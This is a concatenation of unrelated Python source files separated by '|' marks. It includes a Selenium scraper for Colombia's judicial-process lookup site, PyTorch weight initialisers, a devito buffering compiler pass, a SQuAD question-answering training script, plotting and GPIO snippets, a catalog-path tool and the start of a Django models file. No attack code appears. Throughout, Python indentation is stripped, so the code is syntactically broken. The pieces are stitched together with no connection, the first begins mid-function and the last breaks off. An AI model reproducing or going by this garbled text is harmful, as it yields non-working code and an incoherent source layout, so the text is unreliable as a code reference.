xpath_rsult = "//div[@id='updResultadosNum']/span[@id='lblCSVFileStatus']/b/a"
url_link = wait_for_by_xpath(driver, xpath_rsult).get_attribute("href")
url_link = url_link.replace("')", "")
url_link = url_link.replace("javascript:abrirDocumento('", "")
filename = url_link.split("/")[-1]
urllib.request.urlretrieve(url_link, filename=filename)
df = pd.read_csv(
filename, encoding="utf-16", sep=";", skiprows=[0], usecols=range(6)
)
df["Entidad"] = entity_name
logger.info(entity_name.strip() + ": OK")
return df
def scrap_city(driver, city_name, city_code, text2search):
logger.info("*****Obteniendo datos para: " + city_name.strip())
df = pd.DataFrame()
# Se selecciona la ciudad
ddlCiudad = wait_for_by_name(driver, "ddlCiudad")
select_city = Select(ddlCiudad)
select_city.select_by_value(city_code)
if test_error(driver):
logger.debug(
"Se ha presentado una ventana "
"de error inexperada para la ciudad: " + city_name.strip()
)
return df
# Se obtiene la lista de entidades desde el selector
entitys = get_options(driver, "ddlEntidadEspecialidad")
for entity in entitys:
try:
if not "(Inactivo)" in entity:
# Cuando la entidad no esta disponible, se añade "(Inactivo)"
# al nombre de la misma
df_temp = scrap_entity(driver, entity, entitys[entity], text2search)
df = pd.concat([df, df_temp], sort=True)
else:
continue
except Exception as e:
logger.error(
"=====>Error al obtener datos de la entidad: " + entity.strip()
)
logger.exception(e)
df["Ciudad"] = city_name
logger.info(city_name.strip() + ": OK*****")
return df
def scraping_by_text(text2search="sura", output_file=None):
"""Esta funcion permite buscar en la url ´´ENTRY_ENDPOINT´´
de la Rama judicial Colombiana los procesos de demanda encontra
de personas juridicas cuya razon coincida con ´´text2search´´ y
almacenar los resultados en un archivo de excel.
:param text2search: Parametros de busqueda, defaults to "sura"
:type text2search: str, optional
:param output_file: nombre del archivo de resultado, defaults to "result.xlsx"
:type output_file: str, optional
:return: resultados en cada entidad registrada en dicha pagina
:rtype: pd.DataFrame
"""
logger.info("Iniciando scraping")
df = pd.DataFrame()
try:
driver = webdriver.Chrome(ChromeDriverManager().install())
driver.get(ENTRY_ENDPOINT)
if test_error(driver):
logger.debug("Se ha presentado una ventana de error inexperada")
return df
# Se obtiene la lista de ciudad desde el selector
citys = get_options(driver, "ddlCiudad")
for city in citys:
try:
df_temp = scrap_city(driver, city, citys[city], text2search)
df = pd.concat([df, df_temp], sort=True)
except Exception as e:
logger.error(
"=====>Error al obtener datos de la ciudad: " + city.strip()
)
logger.exception(e)
except RequestException as e:
logger.error("Parece que algo esta mal con la conexion a internet")
except KeyboardInterrupt:
logger.warning("Programa detenido")
except Exception as e:
logger.error("Un error inexperado ha ocurrido")
logger.exception(e)
finally:
try:
driver.close()
except:
pass
remove_temp_files()
try:
if output_file:
df.to_excel("result.xlsx")
except Exception as e:
logger.error("No se ha podido guardar el resultado")
logger.exception(e)
logger.info("Scraping terminado")
return df
def scraping_by_number(code="0508831030012015007900", output_file=None):
"""Esta funcion permite buscar en la url ´´ENTRY_ENDPOINT´´
de la Rama judicial Colombiana el proceso que tenga un numero de radicacion
que coincida con ´´code´´ y almacenar los resultados en un archivo de json.
:param code: Parametros de busqueda, defaults to "0508831030012015007900"
:type code: str, optional
:param output_file: nombre del archivo de resultado, defaults to "result.json"
:type output_file: str, optional
:return: informacion del proceso
:rtype: dict
"""
def _tranform_table(data, col):
columns = [
"fecha_actuacion",
"actuacion",
"anotacion",
"fecha_inicia_termino",
"fecha_finaliza_termino",
"fecha_registro",
]
result = [x.text for x in data]
result = [
dict(zip(columns, result[i : i + col])) for i in range(0, len(result), col)
]
return result
logger.info("Iniciando scraping")
resultado = {}
try:
driver = webdriver.Chrome(ChromeDriverManager().install())
driver.get(ENTRY_ENDPOINT)
if test_error(driver):
logger.debug("Se ha presentado una ventana de error inexperada")
ddlCiudad = wait_for_by_name(driver, "ddlCiudad")
select_city = Select(ddlCiudad)
logger.info(f"Buscando en: {code[:5]}")
select_city.select_by_value(code[:5])
if test_error(driver):
logger.debug(
"Se ha presentado una ventana "
"de error inexperada para el numero de radicado: " + code
)
ddlEntidadEspecialidad = wait_for_by_name(driver, "ddlEntidadEspecialidad")
select_entidad = Select(ddlEntidadEspecialidad)
entitys = get_options(driver, "ddlEntidadEspecialidad")
for entity in entitys:
if code[5:9] in entitys[entity]:
break
else:
raise Exception("Juzgado no encontrado")
select_entidad.select_by_value(entitys[entity])
if test_error(driver):
logger.debug(
"Se ha presentado una ventana "
"de error inexperada para el numero de radicado: " + code
)
xpath_txt = "//div[@id='divNumRadicacion']/table/tbody/tr/td/div/input"
txtNumRadicacion = wait_for_by_xpath(driver, xpath_txt)
txtNumRadicacion.clear()
txtNumRadicacion.send_keys(code)
sliderBehaviorConsultaNom_railElement = driver.find_element_by_id(
"sliderBehaviorNumeroProceso_railElement"
)
move = ActionChains(driver)
move.click_and_hold(sliderBehaviorConsultaNom_railElement).move_by_offset(
10, 0
).release().perform()
btnConsulta = wait_for_by_xpath(
driver,
"//div[@id='divNumRadicacion']/table/tbody/tr/td/input[@value='Consultar']",
)
btnConsulta.click()
if test_error(driver):
logger.debug(
"Se ha presentado una ventana "
"de error inexperada para el numero de radicado: " + code
)
resultado = {"numeroRadicacion": code, "datos": {}, "actuaciones": []}
contenedor = wait_for_by_xpath(
driver, "//div[@id='divActuaciones']/div[@class='contenedor']"
)
resultado["datos"]["despacho"] = wait_for_by_xpath(
contenedor, "//span[@id='lblJuzgadoActual']"
).text
resultado["datos"]["ponente"] = wait_for_by_xpath(
contenedor, "//span[@id='lblPonente']"
).text
resultado["datos"]["tipo"] = wait_for_by_xpath(
contenedor, "//span[@id='lblTipo']"
).text
resultado["datos"]["clase"] = wait_for_by_xpath(
contenedor, "//span[@id='lblClase']"
).text
resultado["datos"]["recurso"] = wait_for_by_xpath(
contenedor, "//span[@id='lblRecurso']"
).text
resultado["datos"]["ubicacion"] = wait_for_by_xpath(
contenedor, "//span[@id='lblUbicacion']"
).text
resultado["datos"]["demandantes"] = wait_for_by_xpath(
contenedor, "//span[@id='lblNomDemandante']"
).text.split("-")[1:]
resultado["datos"]["demandantes"] = [x.strip() for x in resultado["datos"]["demandantes"]]
resultado["datos"]["demandados"] = wait_for_by_xpath(
contenedor, "//span[@id='lblNomDemandado']"
).text.split("-")[1:]
resultado["datos"]["demandados"] = [x.strip() for x in resultado["datos"]["demandados"]]
resultado["datos"]["contenido"] = wait_for_by_xpath(
contenedor, "//span[@id='lblContenido']"
).text
resultado["actuaciones"] = contenedor.find_elements(
By.XPATH,
"//table[@class='ActuacionesDetalle']/tbody/tr[@class='tr_contenido']/td",
)
resultado["actuaciones"] = _tranform_table(resultado["actuaciones"], 6)
except RequestException as e:
logger.error("Parece que algo esta mal con la conexion a internet")
except KeyboardInterrupt:
logger.warning("Programa detenido")
except Exception as e:
logger.error("Un error inexperado ha ocurrido")
logger.exception(e)
finally:
try:
driver.close()
except:
pass
try:
if output_file:
with open(output_file, "w") as f:
json.dump(resultado, f)
except Exception as e:
logger.error("No se ha podido guardar el resultado")
logger.exception(e)
logger.info("Scraping terminado")
return resultado
@click.command()
@click.option(
"--text2search",
prompt="Ingrese el texto a durante la busqueda",
help="Texto a buscar",
)
@click.option("--output_file", default="output")
@click.option('--code/--no-code', default=False)
def scraping_wraper(text2search, output_file, code):
if not code:
output_file += ".xlsx"
return scraping_by_text(text2search, output_file)
else:
output_file += ".json"
return scraping_by_number(text2search, output_file)
if __name__ == "__main__":
scraping_wraper() # pylint: disable=E1120
|
# !/usr/bin/env python
# -- coding: utf-8 --
# @Author zengxiaohui
# Datatime:6/22/2021 12:51 PM
# @File:init_weight
import math
import torch
from torch import nn
def _init_weight(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
#---------------------------------------#
def initialize_weights(*models):
for model in models:
real_init_weights(model)
def real_init_weights(m):
if isinstance(m, list):
for mini_m in m:
real_init_weights(mini_m)
else:
if isinstance(m, torch.nn.Conv2d):
torch.nn.init.kaiming_normal_(m.weight, nonlinearity='relu')
if m.bias is not None:
torch.nn.init.constant_(m.bias, 0)
elif isinstance(m, torch.nn.Linear):
m.weight.data.normal_(0.0, std=0.01)
elif isinstance(m, torch.nn.BatchNorm2d):
torch.nn.init.constant_(m.weight, 1)
torch.nn.init.constant_(m.bias, 0)
elif isinstance(m, torch.nn.Module):
for mini_m in m.children():
real_init_weights(mini_m)
else:
print('unkonwn module', m)
|
#!/usr/bin/env python3
import re
import sys
# Parses a common style of defining enums in c, printing each with their hex value.
# With small modifications, this could be used to generate a function to convert status codes to strings.
#
# To parse the statuses in this repo
# cat src/include/com/amazonaws/kinesis/video/webrtcclient/Include.h | ./scripts/parse_status.py
'''
# Example usage (uncomment as a basic test)
paragraph="""
#define STATUS_PARENT 0x4
#define STATUS_CHILD STATUS_PARENT + 0x1
"""
operands_map = operands_by_name(paragraph)
print(operands_map) # {'STATUS_CHILD': ('STATUS_PARENT', 1), 'STATUS_PARENT': (None, 4)}
example_sums = hex_sums(operands_map)
print(example_sums) # {'STATUS_CHILD': "0x5", 'STATUS_PARENT': "0x4"}
'''
pattern = re.compile("#define *([A-Z_]*) *(([A-Z_]*) *\+ *)?0x([0-9]*)")
def operands_by_name(paragraph):
matches = filter(None, [pattern.match(line) for line in paragraph.splitlines()])
return {groups[0]: (groups[2], int(groups[3], base=16)) for groups in
[match.groups() for match in matches]}
def sum_value(by_name, name):
base, idx = by_name[name]
return idx if base is None else idx + sum_value(by_name, base)
def hex_sums(by_name):
return {name: hex(sum_value(operands_map, name)) for name in by_name.keys()}
paragraph = sys.stdin.read()
operands_map = operands_by_name(paragraph)
sums_map = hex_sums(operands_map)
longest_status = len(max(sums_map.keys(), key=len))
lines = ["{:{}s} {}".format(name, longest_status, value) for name, value in sums_map.items()]
print("\n".join(lines))
|
# -*-coding:utf-8-*-
import turtle
if __name__ == "__main__":
turtle.pensize(5)
turtle.speed(10)
turtle.fillcolor("red")
turtle.begin_fill()
turtle.circle(10,180)
turtle.circle(25,110)
turtle.left(50)
turtle.circle(60,45)
turtle.circle(20,170)
turtle.right(24)
turtle.fd(30)
turtle.left(10)
turtle.circle(30,110)
turtle.fd(20)
turtle.left(40)
turtle.circle(90,70)
turtle.circle(30,150)
turtle.right(30)
turtle.fd(15)
turtle.circle(80,90)
turtle.left(15)
turtle.fd(45)
turtle.right(165)
turtle.fd(20)
turtle.left(155)
turtle.circle(150,80)
turtle.left(50)
turtle.circle(150,90)
turtle.end_fill()
turtle.left(150)
turtle.circle(-90,70)
turtle.left(20)
turtle.circle(75,105)
turtle.setheading(60)
turtle.circle(80,98)
turtle.circle(-90,40)
turtle.left(180)
turtle.circle(90,40)
turtle.circle(-80,98)
turtle.setheading(-83)
input("press<Enter>")
|
from .main import build_url, pandize, url_storage_function
wug_urls_book = pickle.load(open(os.path.join(mydir, 'cities_urls'), 'rb'))
|
import matplotlib
# matplotlib.use('Qt5Agg')
from matplotlib import pyplot as plt
from matplotlib.dates import date2num, DateFormatter
import pandas as pd
import datetime as dt
# load data
file_loc = r'C:\Users\Ayush Jain\Documents\MSL\1255 - Assemblie 2 (MARSIM-2)\Data\1255-GLUEDASSEMBLIES-P3.xlsx'
df = pd.read_excel(file_loc, usecols=[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17])
row_skip = 6
raw_date = df.iloc[row_skip:, 0]
raw_time = df.iloc[row_skip:, 1]
datetime = []
# print (raw_date, raw_time)
for m, n in zip(raw_date, raw_time):
value = dt.datetime.combine(m.date(), n)
datetime.append(date2num(value))
#loading data into lists
data_col1 = df.iloc[row_skip:, 2]
data_col2 = df.iloc[row_skip:, 3]
data_col3 = df.iloc[row_skip:, 4]
data_col4 = df.iloc[row_skip:, 5]
data_col5 = df.iloc[row_skip:, 6]
data_col6 = df.iloc[row_skip:, 7]
data_col7 = df.iloc[row_skip:, 8]
data_col8 = df.iloc[row_skip:, 9]
data_col9 = df.iloc[row_skip:, 10]
data_col10 = df.iloc[row_skip:, 11]
data_col11 = df.iloc[row_skip:, 12]
data_col12 = df.iloc[row_skip:, 13]
data_col13 = df.iloc[row_skip:, 14]
data_col14 = df.iloc[row_skip:, 15]
data_col15 = df.iloc[row_skip:, 16]
data_col16 = df.iloc[row_skip:, 17]
#plotting
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax1.plot(datetime, data_col1, label='SA1')
ax1.plot(datetime, data_col2, label='SA2')
ax1.plot(datetime, data_col3, label='SA5')
ax1.plot(datetime, data_col4, label='SB1')
ax1.plot(datetime, data_col5, label='SB3')
ax1.plot(datetime, data_col6, label='SB5')
ax1.plot(datetime, data_col15, label='AVG (TRP)')
ax1.plot(datetime, data_col16, label='TCR')
ax1.plot(datetime, data_col7, label='CP Rear')
ax1.plot(datetime, data_col8, label='CP Front')
# ax1.plot(datetime, data_col9, label='Pressure (V)')
# ax1.plot(datetime, data_col10, label='Pressure (mbar)')
# #limits
ax1.plot(datetime, data_col11, color='red')
ax1.plot(datetime, data_col12, color='red')
ax1.plot(datetime, data_col13, color='red')
ax1.plot(datetime, data_col14, color='red')
#ticks formatting for datetime
ticksSkip = len(datetime)//200
ticksUsed = datetime[::ticksSkip]
tickLabel = [ i for i in ticksUsed]
ax1.set_xticks(ticksUsed)
ax1.set_xticklabels(tickLabel)
fig.autofmt_xdate()
ax1.xaxis.set_major_formatter(DateFormatter('%m/%d %H:%M'))
ax1.set_title('PROBA-3 Glued Assemblies( MARSIM-2 ) \n Mechanical System Laboratory')
ax1.set_xlabel('date/time')
ax1.set_ylabel('Temperature Change Rate (°C/min)')
# ax1.set_ylim([-1.5, 1.5])
ax1.grid()
ax1.legend()
plt.show()
|
print("Hello Alejandro! I was first")
|
from collections import OrderedDict
from itertools import combinations
from cached_property import cached_property
from devito.exceptions import InvalidOperator
from devito.logger import warning
from devito.symbolics import retrieve_function_carriers, uxreplace
from devito.tools import (Bunch, DefaultOrderedDict, as_tuple, filter_ordered, flatten,
timed_pass)
from devito.types import Array, CustomDimension, Dimension, Eq, SteppingDimension
__all__ = ['buffering']
@timed_pass()
def buffering(expressions, callback=None, options=None):
"""
Replace written Functions with Arrays. This gives the compiler more control
over storage layout, data movement (e.g. between host and device), etc.
Parameters
----------
expressions : list of expr-like
The expressions to which the pass is applied.
callback : callable, optional
A mechanism to express what the buffering candidates are, and what
Dimensions, if any, should be replaced by SteppingDimensions, such that
the buffer has a smaller footprint than that of the Function it stems
from. The callable takes a Function as input and returns either None
or a list. If the output is None, then the input is not a buffering
candidate. Otherwise, the output is a buffering candidate and the list
contains the Dimensions to be replaced by new SteppingDimensions. If
unspecified, by default all DiscreteFunctions are turned into buffers,
but no Dimension replacement occurs.
options : dict, optional
The optimization options.
Accepted: ['buf-async-degree'].
* 'buf-async-degree': Specify the size of the buffer. By default, the
buffer size is the minimal one, inferred from the memory accesses in
the ``expressions`` themselves. An asynchronous degree equals to `k`
means that the buffer will be enforced to size=`k` along the introduced
SteppingDimensions. This might help relieving the synchronization
overhead when asynchronous operations are used (these are however
implemented by other passes).
Examples
--------
Assume `contraction_rules=[time]`, meaning that all Functions defined over
`time` should be replaced by a buffer that uses a SteppingDimension in place
of `time` in the same slot.
Consider the Eq below:
Eq(u[time+1, x], u[time, x] + u[time-1, x] + 1)
We see that `u(time, x)` is both read and written. So it is a buffering
candidate. Let's assume `rule(u)` is True, so we apply buffering. This
boils down to:
1. Introducing two Eqs to initialize the buffer `ub`, i.e.
Eq(ub[d, x], u[d, x])
Eq(ub[d-1, x], u[d-1, x])
2. Introduce one Eq to copy `ub` back into `u`
Eq(u[time+1, x], ub[d+1, x])
3. Replace all other occurrences of `u` with `ub`
So eventually we have four Eqs:
Eq(ub[d, x], u[d, x]),
Eq(ub[d-1, x], u[d-1, x])
Eq(ub[d+1, x], ub[d, x] + ub[d-1, x] + 1)
Eq(u[time+1, x], ub[d+1, x])
"""
if callback is None:
def callback(f):
if f.is_DiscreteFunction:
return []
else:
return None
assert callable(callback)
return _buffering(expressions, callback, options)
def _buffering(expressions, callback, options):
async_degree = options['buf-async-degree']
# Locate all Function accesses within the provided `expressions`
accessmap = AccessMapper(expressions)
# Create the buffers
buffers = []
for n, (f, accessv) in enumerate(accessmap.items()):
dims = callback(f)
if dims is None:
# Not a buffer candidate
continue
if accessv.lastwrite is None:
# Read-only Functions cannot be buffering candidates
continue
buffers.append(Buffer(f, dims, accessv, n, async_degree))
# Create Eqs to initialize buffers. Note: a buffer needs to be initialized
# only if the buffered Function is read in at least one place or in the case
# of non-uniform SubDimensions, to avoid uninitialized values to be copied-back
# into the buffered Function
processed = [Eq(b.indexify(), b.function.subs(b.contraction_mapper))
for b in buffers if b.is_read or not b.has_uniform_subdims]
# Substitution rules to replace buffered Functions with buffers
subs = {}
for b in buffers:
for a in b.accessv.accesses:
subs[a] = b.indexify(a.indices)
# Create Eqs to copy back buffers into their buffered Functions
for e in expressions:
processed.append(uxreplace(e, subs))
# We also append the copy-back if `e` is the last-write of some buffers
for b in buffers:
if e is b.accessv.lastwrite:
items = list(zip(e.lhs.indices, b.function.dimensions))
lhs = b.function[[i if i in b.index_mapper else d for i, d in items]]
rhs = b.indexed[[b.index_mapper.get(i, d) for i, d in items]]
if b.subdims_mapper:
processed.append(uxreplace(Eq(lhs, rhs), b.subdims_mapper))
else:
processed.append(Eq(lhs, rhs))
break
return processed
class Buffer(object):
"""
A buffer with metadata attached.
Parameters
----------
function : DiscreteFunction
The object for which a buffer is created.
contracted_dims : list of Dimension
The Dimensions in `function` to be contracted, that is to be replaced
by SteppingDimensions.
accessv : AccessValue
All accesses involving `function`.
n : int
A unique identifier for this Buffer.
async_degree : int, optional
Enforce a size of `async_degree` along the contracted Dimensions.
"""
def __init__(self, function, contracted_dims, accessv, n, async_degree):
self.function = function
self.accessv = accessv
contraction_mapper = {}
index_mapper = {}
dims = list(function.dimensions)
for d in contracted_dims:
assert d in function.dimensions
# Determine the buffer size along `d`
indices = filter_ordered(i.indices[d] for i in accessv.accesses)
slots = [i.xreplace({d: 0, d.spacing: 1}) for i in indices]
size = max(slots) - min(slots) + 1
if async_degree is not None:
if async_degree < size:
warning("Ignoring provided asynchronous degree as it'd be "
"too small for the required buffer (provided %d, "
"but need at least %d for `%s`)"
% (async_degree, size, function.name))
else:
size = async_degree
# Replace `d` with a suitable CustomDimension
bd = CustomDimension('db%d' % n, 0, size-1, size, d)
contraction_mapper[d] = dims[dims.index(d)] = bd
if size > 1:
# Create the necessary SteppingDimensions for indexing
sd = SteppingDimension(name='sb%d' % n, parent=bd)
index_mapper.update({i: i.xreplace({d: sd}) for i in indices})
else:
# Special case, no need to keep a SteppingDimension around
index_mapper.update({i: 0 for i in indices})
self.contraction_mapper = contraction_mapper
self.index_mapper = index_mapper
# Track the SubDimensions used to index into `function`
subdims_mapper = DefaultOrderedDict(set)
for e in accessv.mapper:
try:
# Case 1: implicitly via SubDomains
m = {d.root: v for d, v in e.subdomain.dimension_map.items()}
except AttributeError:
# Case 2: explicitly via the lower-level SubDimension API
m = {i.root: i for i in e.free_symbols
if isinstance(i, Dimension) and (i.is_Sub or not i.is_Derived)}
for d, v in m.items():
subdims_mapper[d].add(v)
if any(len(v) > 1 for v in subdims_mapper.values()):
# Non-uniform SubDimensions. At this point we're going to raise
# an exception. It's either illegal or still unsupported
for v in subdims_mapper.values():
for d0, d1 in combinations(v, 2):
if d0.overlap(d1):
raise InvalidOperator("Cannot apply `buffering` to `%s` as it "
"is accessed over the overlapping "
" SubDimensions `<%s, %s>`" %
(function, d0, d1))
self.subdims_mapper = None
raise NotImplementedError("`buffering` does not support multiple "
"non-overlapping SubDimensions yet.")
else:
self.subdims_mapper = {d: v.pop() for d, v in subdims_mapper.items()}
self.buffer = Array(name='%sb' % function.name,
dimensions=dims,
dtype=function.dtype,
halo=function.halo,
space='mapped')
def __repr__(self):
return "Buffer[%s,<%s:%s>]" % (self.buffer.name,
','.join(str(i) for i in self.contraction_mapper),
','.join(str(i).replace(" ", "")
for i in self.index_mapper))
@property
def is_read(self):
return self.accessv.is_read
@property
def lastwrite(self):
return self.accessv.lastwrite
@property
def has_uniform_subdims(self):
return self.subdims_mapper is not None
@cached_property
def indexed(self):
return self.buffer.indexed
def indexify(self, indices=None):
if indices is None:
indices = list(self.buffer.dimensions)
else:
indices = [self.index_mapper.get(i, i) for i in indices]
return self.indexed[indices]
class AccessValue(object):
"""
A simple data structure tracking the accesses performed by a given Function
in a sequence of expressions.
Parameters
----------
function : Function
The target Function.
mapper : dict
A mapper from expressions to Indexeds, representing all accesses to
`function` in a sequence of expressions.
"""
def __init__(self, function, mapper):
self.function = function
self.mapper = mapper
@cached_property
def exprs(self):
return tuple(self.mapper)
@cached_property
def accesses(self):
return tuple(flatten(as_tuple(i.reads) + as_tuple(i.write)
for i in self.mapper.values()))
@cached_property
def is_read(self):
return any(av.reads for av in self.mapper.values())
@cached_property
def lastwrite(self):
for e, av in reversed(self.mapper.items()):
if av.write is not None:
return e
return None
AccessTuple = lambda: Bunch(reads=[], write=None)
class AccessMapper(OrderedDict):
def __init__(self, expressions):
mapper = DefaultOrderedDict(lambda: DefaultOrderedDict(AccessTuple))
for e in expressions:
for i in retrieve_function_carriers(e.rhs):
mapper[i.function][e].reads.append(i)
mapper[e.lhs.function][e].write = e.lhs
super().__init__([(f, AccessValue(f, mapper[f])) for f in mapper])
|
import torch.nn as nn
import torch.optim as optim
import argparse
from Data.utils import read_data,get_structure,get_index,get_question_set,get_word_embeddings,get_prediction,get_f1,get_exact_match
from Data.dataloader import DataLoader
from Model.model import Model
def train(model,dataloader,lossFunction,optimizer,epochs,iterations,dataloader_validation,valid_iters):
for epoch in range(epochs):
model.train()
optimizer.zero_grad()
loss=0
for _ in range(iterations):
context_sentence,context_char,question_sentence,question_char,start,end=dataloader.get_next()
start_logits,end_logits=model(context_sentence,question_sentence,question_char,context_char)
loss+=lossFunction(start_logits,start)
loss+=lossFunction(end_logits,end)
final_loss=loss.item()
loss.backward()
optimizer.step()
f1,em,valid_loss=validate(model,dataloader_validation,valid_iters,lossFunction)
print('epoch=',epoch+1,'training loss=',final_loss/iterations,'validation loss=',valid_loss,'F1 score=',f1,'Exact Match score=',em)
def validate(model,dataloader,iterations,lossFunction):
model.eval()
loss=0
em=0
f1=0
for _ in range(iterations):
context_sentence,context_char,question_sentence,question_char,start,end=dataloader.get_next()
start_logits,end_logits=model(context_sentence,question_sentence,question_char,context_char)
loss+=lossFunction(start_logits,start)
loss+=lossFunction(end_logits,end)
pred=get_prediction(start_logits,end_logits)
gold=[int(start[0]),int(end[0])]
f1+=get_f1(gold,pred)
em+=get_exact_match(gold,pred)
return f1/iterations,em/iterations,loss.item()/iterations
def main(args):
path=args.train_path
path_valid=args.dev_path
data=read_data(path)
data_valid=read_data(path_valid)
hidden_size=args.hidden_size
char_size=args.convolutions
embedding_size=args.embedding_size
char_embed_size=args.char_embedding_size
dropout=args.dropout
kernel_size=args.kernel_size1
type=args.modeling_type
output,char_set=get_structure(data)
output_valid,char_set_valid=get_structure(data_valid)
for char in char_set_valid:
char_set.add(char)
char_output,char_to_int,int_to_char,n_char=get_index(output,char_set)
question_set=get_question_set(output)
char_output_valid,x,y,z=get_index(output_valid,char_set)
question_set_valid=get_question_set(output_valid)
word_dict_question=get_word_embeddings(question_set,embedding_size)
word_dict_context=get_word_embeddings(output['contexts'],embedding_size)
word_dict_question_valid=get_word_embeddings(question_set_valid,embedding_size)
word_dict_context_valid=get_word_embeddings(output_valid['contexts'],embedding_size)
dataLoader=DataLoader(output,char_output,word_dict_context,word_dict_question)
dataLoader_valid=DataLoader(output_valid,char_output_valid,word_dict_context_valid,word_dict_question_valid)
model=Model(embedding_size,char_size,hidden_size,kernel_size,n_char,type,char_embed_size,dropout).cuda()
epochs=args.epochs
iterations=len(question_set)
iterations_validation=len(question_set_valid)
lossFunction=nn.CrossEntropyLoss()
optimizer=optim.Adadelta(model.parameters(),lr=args.learning_rate)
train(model,dataLoader,lossFunction,optimizer,epochs,iterations,dataLoader_valid,iterations_validation)
def setup():
parser=argparse.ArgumentParser('options for file')
parser.add_argument('-- dev_path',type=str,default='/home/pranav/ml/data/SQuAD 1.1/dev-v1.1.json',help='enter development file path')
parser.add_argument('--train_path',type=str,default='/home/pranav/ml/data/SQuAD 1.1/train-v1.1.json',help='enter training file path')
parser.add_argument('--learning_rate',type=float,default=0.5,help='learning rate')
parser.add_argument('--epochs',type=int,default=12)
parser.add_argument('--modeling_type',type=str,default='concat',help='enter type for modeling')
parser.add_argument('--hidden_size',type=int,default=100,help="hidden sizes for LSTM's")
parser.add_argument('--convolutions',type=int,default=100,help='output channels for Conv1D')
parser.add_argument('--embedding_size',type=int,default=100,help='embedding size for Word2Vec')
parser.add_argument('--kernel_size1',type=int,default=5,help='first kernel size')
parser.add_argument('--dropout',type=float,default=0.2)
parser.add_argument('--char_embedding_size',type=int,default=8)
args=parser.parse_args()
return args
if __name__=='__main__':
args=setup()
main(args)
|
__version__ = "0.1.0"
from .grids import get_distances, get_metrics, get_coords, get_grid
from .utils import *
from . import pnplot
from . import utils
|
from knigavuhe import Client
cl = Client()
r = cl.search_books('Агата Кристи')
print(r)
print(r[0])
|
#!/usr/bin/env python
"""
Tool for combining and converting paths within catalog files
"""
import sys
import json
import argparse
from glob import glob
from pathlib import Path
def fail(message):
print(message)
sys.exit(1)
def build_catalog():
catalog_paths = []
for source_glob in CLI_ARGS.sources:
catalog_paths.extend(glob(source_glob))
items = []
for catalog_original_path in catalog_paths:
catalog_path = Path(catalog_original_path).absolute()
print('Loading catalog "{}"'.format(str(catalog_original_path)))
if not catalog_path.is_file():
fail('Unable to find catalog file "{}"'.format(str(catalog_path)))
with open(catalog_path, 'r', encoding='utf-8') as catalog_file:
catalog_items = json.load(catalog_file)
base_path = catalog_path.parent.absolute()
for item in catalog_items:
new_item = {}
for entry, entry_original_path in item.items():
entry_path = Path(entry_original_path)
entry_path = entry_path if entry_path.is_absolute() else (base_path / entry_path).absolute()
if ((len(CLI_ARGS.check) == 1 and CLI_ARGS.check[0] == 'all')
or entry in CLI_ARGS.check) and not entry_path.is_file():
note = 'Catalog "{}" - Missing file for "{}" ("{}")'.format(
str(catalog_original_path), entry, str(entry_original_path))
if CLI_ARGS.on_miss == 'fail':
fail(note + ' - aborting')
if CLI_ARGS.on_miss == 'ignore':
print(note + ' - keeping it as it is')
new_item[entry] = str(entry_path)
elif CLI_ARGS.on_miss == 'drop':
print(note + ' - dropping catalog item')
new_item = None
break
else:
print(note + ' - removing entry from item')
else:
new_item[entry] = str(entry_path)
if CLI_ARGS.output is not None and new_item is not None and len(new_item.keys()) > 0:
items.append(new_item)
if CLI_ARGS.output is not None:
catalog_path = Path(CLI_ARGS.output).absolute()
print('Writing catalog "{}"'.format(str(CLI_ARGS.output)))
if CLI_ARGS.make_relative:
base_path = catalog_path.parent
for item in items:
for entry in item.keys():
item[entry] = str(Path(item[entry]).relative_to(base_path))
if CLI_ARGS.order_by is not None:
items.sort(key=lambda i: i[CLI_ARGS.order_by] if CLI_ARGS.order_by in i else '')
with open(catalog_path, 'w', encoding='utf-8') as catalog_file:
json.dump(items, catalog_file, indent=2)
def handle_args():
parser = argparse.ArgumentParser(description='Tool for combining catalog files and/or ordering, checking and '
'converting paths within catalog files')
parser.add_argument('--output', help='Write collected catalog items to this new catalog file')
parser.add_argument('--make-relative', action='store_true',
help='Make all path entries of all items relative to new catalog file\'s parent directory')
parser.add_argument('--check',
help='Comma separated list of path entries to check for existence '
'("all" for checking every entry, default: no checks)')
parser.add_argument('--on-miss', default='fail', choices=['fail', 'drop', 'remove', 'ignore'],
help='What to do if a path is not existing: '
'"fail" (exit program), '
'"drop" (drop catalog item) or '
'"remove" (remove path entry from catalog item) or '
'"ignore" (keep it as it is)')
parser.add_argument('--order-by', help='Path entry used for sorting items in target catalog')
parser.add_argument('sources', nargs='+', help='Source catalog files (supporting wildcards)')
return parser.parse_args()
if __name__ == "__main__":
CLI_ARGS = handle_args()
CLI_ARGS.check = [] if CLI_ARGS.check is None else CLI_ARGS.check.split(',')
build_catalog()
|
import RPi.GPIO as GPIO
import time
import threading
GPIO.setmode(GPIO.BOARD)
BB = 35
GPIO.setup(BB,GPIO.OUT)
def Scan():
time.sleep(1)
GPIO.output(BB,True)
time.sleep(1)
GPIO.output(BB,False)
code = input()
time.sleep(0.1)
return code
#def GetCode():
# code = input("Code:")
# print(code)
# time.sleep(1)
#thread1 = threading.Thread(target = GetCode,args=())
#thread2 = threading.Thread(target = Scan,args=())
#thread1.start()
#time.sleep(1)
#thread2.start()
#thread1.join()
#thread2.join()
|
# vim: set filencoding=utf8
"""
SnakePlan Project Models
@author: Mike Crute (mcrute@gmail.com)
@date: July 09, 2010
"""
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.db import models as m
from django.db.models import Model
from django.contrib.auth.models import User
DAY = (
(0, 'Sunday'),
(1, 'Monday'),
(2, 'Tuesday'),
(3, 'Wednesday'),
(4, 'Thursday'),
(5, 'Friday'),
(6, 'Saturday'),
)
STATUSES = (
(0, 'Draft'),
(1, 'Started'),
(2, 'Finished'),
(3, 'Delivered'),
(4, 'Accepted'),
(5, 'Rejected'),
)
class Project(Model):
name = m.CharField(max_length=200)
